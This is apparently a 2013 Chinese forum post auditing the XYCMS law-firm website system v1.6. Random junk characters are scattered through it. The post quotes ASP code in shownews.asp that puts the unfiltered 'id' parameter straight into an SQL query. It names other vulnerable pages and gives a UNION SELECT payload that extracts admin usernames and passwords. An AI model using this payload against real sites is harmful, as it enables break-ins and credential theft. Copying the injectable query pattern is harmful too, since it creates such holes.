前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
$ K# A: o$ T% w6 B6 N; w . @% p3 v& J- i; O; x
淫荡分割线
" Q9 Q& Z t* X' ]! N--------------------------------------------------------
* } M4 [8 K3 K6 e4 H* g : |+ P$ H- Z7 e! x
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)$ l1 J5 b( Q. k
源码地址:http://down.chinaz.com/soft/29233.htm/ Z6 R8 |! [: x
8 H- ^4 A- Z+ `, W+ L漏洞文件:shownews.asp2 U4 T& G1 H( _$ ?* H6 n- s: X) u3 s0 b
漏洞代码:7-13行
# z9 r% X" l& ~5 v, g4 t! ?
" q* K# m% |/ U- c/ d) t 7 F5 w A4 @+ ?3 c7 O
<% 0 I0 p' }2 _3 R. n& |
id=request.QueryString("id")
. l, K6 Y) o+ y/ s2 S 1 U0 h% X5 V, H" a0 l7 ~0 c
set snews=server.createobject("adodb.recordset")
7 B9 Y$ o& y2 W. e2 lexec="select * from [news] where id="&id0 O4 i- j+ s: T0 d$ q
snews.open exec,conn,1,1' |' t& H# u, f! g* d
%>6 B9 U- S- n) ^3 i6 c: v: v4 p/ E
5 ?7 g2 ~, u0 B# { ; b+ i! ^4 i+ P- r6 S4 b3 h
什么过滤都没有 直造成注入
7 P) |4 i" v1 ?; a, v& @( _0 h
# P( a! x, _2 E# s3 ^注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ `' V3 W+ M2 y! }# R & V" ?3 K9 W8 J7 E8 B
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找 |- o2 ?5 A9 M9 h+ g1 N
! H: w' d: z) e0 v( h5 E
' q- q6 ~6 ~' n9 X& b+ w( O- m/ bexp: union select 1,admin,password,4,5,7 from admin_user
+ Y$ B$ J9 n! Z/ o# k. X* w. h3 r7 z/ T8 I9 B* i0 F$ Q# W
|
发表于 2013-4-4 17:28:12
收藏
支持
反对